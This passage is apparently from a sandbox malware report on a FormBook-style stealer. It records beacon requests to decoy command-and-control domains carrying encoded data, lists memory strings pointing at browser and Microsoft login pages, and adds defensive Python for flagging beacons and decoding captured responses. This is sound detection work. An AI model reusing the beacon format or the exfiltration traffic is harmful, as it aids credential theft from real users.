                Data Ascii: vf5pwn=e/XjuvFYh54w46pA1RfNQrskaKM35vQzGWRtc1f830b1J28TFtcy+DNPLAsUcoNtPpnvXhm3r8HkKuwpv9iHo7jEwpBNaIxQv6OKYS6zZ2PQarMrMC46HkvkIcG6FnnChU2ULiCWWRJy6xEP5FB9KvDFrUmp+Qr3jMf8eBF4LuLeRkos1uJKe7rcIB/NcnMUCyVeYAs=
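The GET and POST entries above share a shape worth checking mechanically rather than by eye: a four-character directory, one query parameter whose 16-character value (lHul=nfQTqL40vDEpIp30) is identical on every host, a second parameter carrying a long base64 blob that is not percent-encoded (raw `/`, `+` and `=` in a form-urlencoded context), parameter order that changes between hosts, the same Chrome/46.0.2490.4 User-Agent on every request, and a POST whose Origin and Referer point back at the contacted host itself. The Python below is an added triage helper, not part of the Joe Sandbox report and not the malware's own code. Three request texts are transcribed from the entries above, a fourth benign request is constructed as a control, and the trait names, the 40-character blob threshold and the Suricata SID are this example's own choices. Note the deliberate avoidance of `urllib.parse.parse_qsl`: it would turn every `+` in the blob into a space.

```python
"""FormBook-style beacon triage over the HTTP entries recorded in this report.
Added example; not Joe Sandbox code. Request texts are transcribed from the
report, BENIGN_REQUEST is constructed, trait names and the SID are arbitrary."""
import re
from urllib.parse import urlsplit

UA = ("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 "
      "(KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36")

SAMPLE_REQUESTS = [
    # Parameter order differs between hosts; the 16-character token does not.
    "GET /v2c3/?lHul=nfQTqL40vDEpIp30&vf5pwn=4KW7rJi8xQgG5JuhUUy4oHXtvgFnSuEzPrutLC9Z2JC7riozJk19TyUHcpxc9ASY"
    "/m5rLPYp2hVK9kL/MGxet5jRO5AJzixTprPi8JCHFDrvphN2mQYrYWI0Ljg/1k5GCA== HTTP/1.1\r\n"
    "Host: www.dalong.site\r\nConnection: close\r\nUser-Agent: " + UA + "\r\n\r\n",
    "GET /xamn/?vf5pwn=eI40u+kXl6dCNOxtOqaVh3t2St2MUXLKXPnA2oRVh57cb1FOyw5acKt1uSVkrtOGePUCnlUQIJS7kZjahSWR4W4f"
    "WnAv/fqpdm4W58wxIsvJOF8/cGdHH0QztCYqDUNhvQ==&lHul=nfQTqL40vDEpIp30 HTTP/1.1\r\n"
    "Host: www.mgeducacaopro.online\r\nConnection: close\r\nUser-Agent: " + UA + "\r\n\r\n",
    "POST /8pln/ HTTP/1.1\r\nHost: www.ultraleap.net\r\nOrigin: http://www.ultraleap.net\r\n"
    "Content-Length: 207\r\nContent-Type: application/x-www-form-urlencoded\r\nConnection: close\r\n"
    "Referer: http://www.ultraleap.net/8pln/\r\nUser-Agent: " + UA + "\r\n\r\n"
    "vf5pwn=e/XjuvFYh54w46pA1RfNQrskaKM35vQzGWRtc1f830b1J28TFtcy+DNPLAsUcoNtPpnvXhm3r8HkKuwpv9iHo7jEwpBNaIxQv6OKYS6zZ2PQ"
    "arMrMC46HkvkIcG6FnnChU2ULiCWWRJy6xEP5FB9KvDFrUmp+Qr3jMf8eBF4LuLeRkos1uJKe7rcIB/NcnMUCyVeYAs=",
]
# Constructed control: an ordinary browser search request, not from the report.
BENIGN_REQUEST = ("GET /search?q=formbook HTTP/1.1\r\nHost: www.example.com\r\n"
                  "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/128.0.0.0 Safari/537.36\r\n\r\n")

DIR_RE = re.compile(r"^/[a-z0-9]{4}/$")              # /v2c3/, /xamn/, /8pln/ ...
TOKEN_RE = re.compile(r"^[A-Za-z0-9]{16}$")           # nfQTqL40vDEpIp30
BLOB_RE = re.compile(r"^[A-Za-z0-9+/]{40,}={0,2}$")   # long base64, not percent-encoded


def split_params(qs: str) -> list[tuple[str, str]]:
    """Split k=v&k=v WITHOUT percent-decoding; parse_qsl would turn '+' into ' '."""
    pairs = []
    for item in qs.split("&"):
        if item:
            key, _, value = item.partition("=")
            pairs.append((key, value))
    return pairs


def parse_request(raw: str) -> dict:
    """Minimal HTTP/1.1 request parser: request line, headers (lower-cased), body."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    parts = urlsplit(target)
    return {"method": method, "path": parts.path, "query": parts.query,
            "headers": headers, "body": body}


def formbook_traits(req: dict) -> list[str]:
    """Beacon traits this request shows, in a fixed order; empty means none."""
    traits = []
    h = req["headers"]
    if DIR_RE.match(req["path"]):
        traits.append("4-char-dir")
    if h.get("user-agent") == UA:
        traits.append("fixed-ua")
    if req["method"] == "GET":
        values = [v for _, v in split_params(req["query"])]
        if (len(values) == 2 and any(TOKEN_RE.match(v) for v in values)
                and any(BLOB_RE.match(v) for v in values)):
            traits.append("token+blob-query")
    elif req["method"] == "POST":
        values = [v for _, v in split_params(req["body"])]
        if (len(values) == 1 and BLOB_RE.match(values[0])
                and h.get("content-type", "").startswith("application/x-www-form-urlencoded")):
            traits.append("blob-body")
        if h.get("host") and h.get("origin") == "http://" + h["host"]:
            traits.append("self-origin")
    return traits


def extract_iocs(reqs: list[dict]) -> dict:
    """Pivots worth blocking or hunting on, taken only from requests with 3+ traits."""
    flagged = [r for r in reqs if len(formbook_traits(r)) >= 3]
    tokens = {v for r in flagged for _, v in split_params(r["query"]) if TOKEN_RE.match(v)}
    return {"hosts": sorted({r["headers"]["host"] for r in flagged}),
            "paths": sorted({r["path"] for r in flagged}),
            "tokens": sorted(tokens)}


def suricata_rule(token: str, sid: int = 9000001) -> str:
    """Signature keyed on this sample's constant query token plus its User-Agent."""
    return ('alert http $HOME_NET any -> $EXTERNAL_NET any ('
            'msg:"FormBook-style beacon, constant query token"; flow:established,to_server; '
            f'http.uri; content:"={token}"; http.user_agent; content:"Chrome/46.0.2490.4"; '
            f'classtype:trojan-activity; sid:{sid}; rev:1;)')


if __name__ == "__main__":
    parsed = [parse_request(r) for r in SAMPLE_REQUESTS + [BENIGN_REQUEST]]
    for req in parsed:
        print(req["method"], req["headers"]["host"], req["path"], formbook_traits(req))
    iocs = extract_iocs(parsed)
    print(iocs)
    for tok in iocs["tokens"]:
        print(suricata_rule(tok))
```

The token-based rule is deliberately narrow: it catches this sample's beacons across every decoy domain in the list, but a rebuilt sample carries a different token, so the User-Agent and the URI shape are the longer-lived pivots.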
            Source: global traffic | HTTP traffic detected:
                HTTP/1.1 404 Not Found
                Date: Thu, 26 Sep 2024 13:22:25 GMT
                Server: Apache
                Content-Length: 203
                Connection: close
                Content-Type: text/html; charset=iso-8859-1
                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /a4ar/ was not found on this server.</p></body></html>
            Source: global traffic | HTTP traffic detected:
                HTTP/1.1 404 Not Found
                Connection: close
                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                pragma: no-cache
                content-type: text/html
                content-length: 796
                date: Thu, 26 Sep 2024 13:22:54 GMT
                server: LiteSpeed
                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; ">     <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;">        <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>
            Source: global traffic | HTTP traffic detected:
                HTTP/1.1 404 Not Found
                Connection: close
                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                pragma: no-cache
                content-type: text/html
                content-length: 796
                date: Thu, 26 Sep 2024 13:22:57 GMT
                server: LiteSpeed
                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; ">     <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;">        <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>
            Source: global traffic | HTTP traffic detected:
                HTTP/1.1 404 Not Found
                Connection: close
                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                pragma: no-cache
                content-type: text/html
                content-length: 796
                date: Thu, 26 Sep 2024 13:23:00 GMT
                server: LiteSpeed
                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; ">     <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;">        <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>
            Source: global traffic | HTTP traffic detected:
                HTTP/1.1 404 Not Found
                Connection: close
                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                pragma: no-cache
                content-type: text/html
                content-length: 796
                date: Thu, 26 Sep 2024 13:23:02 GMT
                server: LiteSpeed
                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; ">     <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;">        <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>
            Source: global traffic | HTTP traffic detected:
                HTTP/1.1 404 Not Found
                Date: Thu, 26 Sep 2024 13:23:22 GMT
                Server: Apache
                X-Frame-Options: SAMEORIGIN
                Content-Length: 32106
                X-XSS-Protection: 1; mode=block
                Connection: close
                Content-Type: text/html
                Data Ascii: <!DOCTYPE html><html lang="en"><head>    <meta charset="utf-8">    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">    <meta name="description" content="Fables">    <meta name="author" content="Enterprise Development">    <link rel="shortcut icon" href="assets/custom/images/shortcut.png">    <title> 404</title>    <!-- animate.css-->    <link href="assets/vendor/animate.css-master/animate.min.css" rel="stylesheet">    <!-- Load Screen -->    <link href="assets/vendor/loadscreen/css/spinkit.css" rel="stylesheet">    <!-- GOOGLE FONT -->    <link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i" rel="stylesheet">    <!-- Font Awesome 5 -->    <link href="assets/vendor/fontawesome/css/fontawesome-all.min.css" rel="stylesheet">    <!-- Fables Icons -->    <link href="assets/custom/css/fables-icons.css" rel="sty
            Source: global traffic | HTTP traffic detected:
                HTTP/1.1 404 Not Found
                Date: Thu, 26 Sep 2024 13:23:25 GMT
                Server: Apache
                X-Frame-Options: SAMEORIGIN
                Content-Length: 32106
                X-XSS-Protection: 1; mode=block
                Connection: close
                Content-Type: text/html
                Data Ascii: <!DOCTYPE html><html lang="en"><head>    <meta charset="utf-8">    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">    <meta name="description" content="Fables">    <meta name="author" content="Enterprise Development">    <link rel="shortcut icon" href="assets/custom/images/shortcut.png">    <title> 404</title>    <!-- animate.css-->    <link href="assets/vendor/animate.css-master/animate.min.css" rel="stylesheet">    <!-- Load Screen -->    <link href="assets/vendor/loadscreen/css/spinkit.css" rel="stylesheet">    <!-- GOOGLE FONT -->    <link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i" rel="stylesheet">    <!-- Font Awesome 5 -->    <link href="assets/vendor/fontawesome/css/fontawesome-all.min.css" rel="stylesheet">    <!-- Fables Icons -->    <link href="assets/custom/css/fables-icons.css" rel="sty
            Source: global traffic | HTTP traffic detected:
                HTTP/1.1 404 Not Found
                Date: Thu, 26 Sep 2024 13:23:27 GMT
                Server: Apache
                X-Frame-Options: SAMEORIGIN
                Content-Length: 32106
                X-XSS-Protection: 1; mode=block
                Connection: close
                Content-Type: text/html
                Data Ascii: <!DOCTYPE html><html lang="en"><head>    <meta charset="utf-8">    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">    <meta name="description" content="Fables">    <meta name="author" content="Enterprise Development">    <link rel="shortcut icon" href="assets/custom/images/shortcut.png">    <title> 404</title>    <!-- animate.css-->    <link href="assets/vendor/animate.css-master/animate.min.css" rel="stylesheet">    <!-- Load Screen -->    <link href="assets/vendor/loadscreen/css/spinkit.css" rel="stylesheet">    <!-- GOOGLE FONT -->    <link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i" rel="stylesheet">    <!-- Font Awesome 5 -->    <link href="assets/vendor/fontawesome/css/fontawesome-all.min.css" rel="stylesheet">    <!-- Fables Icons -->    <link href="assets/custom/css/fables-icons.css" rel="sty
            Source: global traffic | HTTP traffic detected:
                HTTP/1.1 404 Not Found
                Date: Thu, 26 Sep 2024 13:23:31 GMT
                Server: Apache
                X-Frame-Options: SAMEORIGIN
                Content-Length: 32106
                X-XSS-Protection: 1; mode=block
                Connection: close
                Content-Type: text/html; charset=utf-8
                Data Ascii: <!DOCTYPE html><html lang="en"><head>    <meta charset="utf-8">    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">    <meta name="description" content="Fables">    <meta name="author" content="Enterprise Development">    <link rel="shortcut icon" href="assets/custom/images/shortcut.png">    <title> 404</title>    <!-- animate.css-->    <link href="assets/vendor/animate.css-master/animate.min.css" rel="stylesheet">    <!-- Load Screen -->    <link href="assets/vendor/loadscreen/css/spinkit.css" rel="stylesheet">    <!-- GOOGLE FONT -->    <link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i" rel="stylesheet">    <!-- Font Awesome 5 -->    <link href="assets/vendor/fontawesome/css/fontawesome-all.min.css" rel="stylesheet">    <!-- Fables Icons -->    <link href="assets/custom/css/fables-icons.css" rel
            Source: global traffic | HTTP traffic detected:
                HTTP/1.1 404 Not Found
                Date: Thu, 26 Sep 2024 13:25:00 GMT
                Content-Type: text/html
                Transfer-Encoding: chunked
                Connection: close
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OWVRwH4o6es9cjRv9KQrITzRg2KDIR%2BsbB4vGKVMxFspfW7ZdvE1tyPEK1GgciZs0GZxZGO43cv1FKkEn6nYLYyMI%2F88tCw8sF%2Fn6r8xIkK2ldEGGmP7x%2BIDIGGfKPcqDmY30A%3D%3D"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8c9393d46f097d0b-EWR
                Content-Encoding: gzip
                Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a
                Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$
            Source: global traffic | HTTP traffic detected:
                HTTP/1.1 404 Not Found
                Date: Thu, 26 Sep 2024 13:25:03 GMT
                Content-Type: text/html
                Transfer-Encoding: chunked
                Connection: close
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=crm9UGmSKpf08C3wAoPeM%2F09gSKvJtzPxskaWgjSa2cigzSTY8pZ4z9oDcb3zyg2wQLHivAoqsVBmHYZUVIse8y5cUKh9PoyxXvnmAeNWfweGgQwvpw290brO5ZfR3dZGZMHxA%3D%3D"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8c9393e7ad8a42eb-EWR
                Content-Encoding: gzip
                Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0
            Source: global traffic | HTTP traffic detected:
                HTTP/1.1 404 Not Found
                Date: Thu, 26 Sep 2024 13:25:06 GMT
                Content-Type: text/html
                Transfer-Encoding: chunked
                Connection: close
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IProemyRG98En7CWZdF5GfaX%2FSemz5Ye%2BaDogSHz%2FU3WGZsXphsfVu4nAYsd1MLoJaxK1nz%2BqW7CmqVrraUXmpxK8CCNoNnbvuyhZRFApA2N1VLsn%2BlD%2BvpUWVFo%2FsnxdOtvlA%3D%3D"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8c9393fb0e5918bc-EWR
                Content-Encoding: gzip
                Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0
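The three Cloudflare entries above carry a chunked, gzip-compressed body, so their Data Ascii is unreadable, and the first of the three ends before the terminating zero-length chunk. The Python below is an added helper, not part of the Joe Sandbox report: it turns a Data Raw hex dump back into bytes, strips the chunk framing, inflates the gzip member and reports whether the dump was complete, reading the declared inflated size from the gzip trailer as a cross-check. The two dumps and header values embedded are transcribed from entries in this section (the 203-byte Apache 404 and the second Cloudflare 404); the truncated variant exercised at the end is constructed by cutting the terminating chunk off the complete dump.

```python
"""Recover response bodies from the report's 'Data Raw' hex dumps.
Added example; not Joe Sandbox code. Dumps and headers are transcribed from
the 404 responses in this report; nothing here is fetched from the network."""
import gzip
import struct

APACHE_404_HEADERS = {"Content-Length": "203", "Content-Type": "text/html; charset=iso-8859-1"}
APACHE_404_DUMP = " ".join([
    "3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44",
    "20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65",
    "3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79",
    "3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74",
    "65 64 20 55 52 4c 20 2f 61 34 61 72 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73",
    "20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a",
])

CLOUDFLARE_404_HEADERS = {"Transfer-Encoding": "chunked", "Content-Encoding": "gzip",
                          "Content-Type": "text/html"}
# One 0xa7 (167 byte) chunk holding a complete gzip member, then the "0" chunk.
CLOUDFLARE_404_DUMP = " ".join([
    "61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44",
    "c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4",
    "b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a",
    "87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70",
    "da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00",
    "00 0d 0a 30 0d 0a 0d 0a",
])


def hexdump_to_bytes(dump: str) -> bytes:
    """The report's space-separated hex ('3c 21 44 ...') back to raw bytes."""
    return bytes.fromhex(dump)


def dechunk(body: bytes) -> tuple[bytes, bool]:
    """Strip HTTP/1.1 chunked framing. Returns (payload, saw_terminating_chunk)."""
    out = bytearray()
    pos = 0
    while True:
        eol = body.find(b"\r\n", pos)
        if eol < 0:
            return bytes(out), False        # size line missing: dump ends early
        size = int(body[pos:eol].split(b";", 1)[0], 16)   # drop chunk extensions
        if size == 0:
            return bytes(out), True         # zero-length chunk ends the body
        start = eol + 2
        chunk = body[start:start + size]
        out += chunk
        if len(chunk) < size:
            return bytes(out), False        # cut off in the middle of a chunk
        pos = start + size + 2              # skip the CRLF that follows the chunk


def gzip_trailer(member: bytes) -> tuple[int, int]:
    """(CRC32, ISIZE) from the last 8 bytes of a gzip member, little-endian."""
    return struct.unpack("<II", member[-8:])


def decode_body(dump: str, headers: dict) -> dict:
    """Undo chunking and gzip the way an HTTP client would, driven by the headers."""
    raw = hexdump_to_bytes(dump)
    complete = True
    if headers.get("Transfer-Encoding", "").lower() == "chunked":
        raw, complete = dechunk(raw)
    if headers.get("Content-Encoding", "").lower() != "gzip":
        return {"body": raw, "complete": complete, "isize": len(raw)}
    if len(raw) < 18:                       # 10-byte header + 8-byte trailer minimum
        return {"body": None, "complete": False, "isize": None, "error": "gzip member too short"}
    _crc, isize = gzip_trailer(raw)         # declared inflated size, readable even before inflating
    try:
        body = gzip.decompress(raw)         # verifies CRC32 and ISIZE itself
    except (EOFError, gzip.BadGzipFile) as exc:
        return {"body": None, "complete": False, "isize": isize, "error": str(exc)}
    return {"body": body, "complete": complete, "isize": isize}


if __name__ == "__main__":
    for name, dump, hdrs in [("apache", APACHE_404_DUMP, APACHE_404_HEADERS),
                             ("cloudflare", CLOUDFLARE_404_DUMP, CLOUDFLARE_404_HEADERS)]:
        result = decode_body(dump, hdrs)
        print(name, result["complete"], result["isize"])
        print(result["body"].decode("utf-8", "replace") if result["body"] else result["error"])
```

For the entry whose dump stops after the data chunk (the first Cloudflare response), `dechunk` returns the 167 payload bytes with `complete=False`, and the gzip member still inflates because the whole member sat inside that one chunk; only a dump cut inside the chunk would leave an undecodable stream.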
            Source: YKkstfciYBQ.exe, 00000003.00000002.3900775999.00000000063C2000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.b5x7vk.agency
            Source: YKkstfciYBQ.exe, 00000003.00000002.3900775999.00000000063C2000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.b5x7vk.agency/zznj/
            Source: mstsc.exe, 00000004.00000003.2351304274.000000000767E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: mstsc.exe, 00000004.00000003.2351304274.000000000767E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: mstsc.exe, 00000004.00000003.2351304274.000000000767E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: mstsc.exe, 00000004.00000003.2351304274.000000000767E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: mstsc.exe, 00000004.00000003.2351304274.000000000767E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: mstsc.exe, 00000004.00000003.2351304274.000000000767E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: mstsc.exe, 00000004.00000003.2351304274.000000000767E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: YKkstfciYBQ.exe, 00000003.00000002.3899395542.000000000490C000.00000004.80000000.00040000.00000000.sdmp, mstsc.exe, 00000004.00000002.3897855714.000000000554C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Open
            Source: mstsc.exe, 00000004.00000003.2346362902.00000000006C5000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000004.00000002.3896033202.00000000006BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: mstsc.exe, 00000004.00000003.2346362902.00000000006C5000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000004.00000002.3896033202.00000000006BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: mstsc.exe, 00000004.00000003.2346362902.00000000006C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2
            Source: mstsc.exe, 00000004.00000003.2346362902.00000000006C5000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000004.00000002.3896033202.00000000006BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: mstsc.exe, 00000004.00000003.2346362902.00000000006C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033E
            Source: mstsc.exe, 00000004.00000003.2346362902.00000000006C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
            Source: mstsc.exe, 00000004.00000003.2346362902.00000000006C5000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000004.00000002.3896033202.00000000006BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033k
            Source: mstsc.exe, 00000004.00000003.2346362902.00000000006C5000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000004.00000002.3896033202.00000000006BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
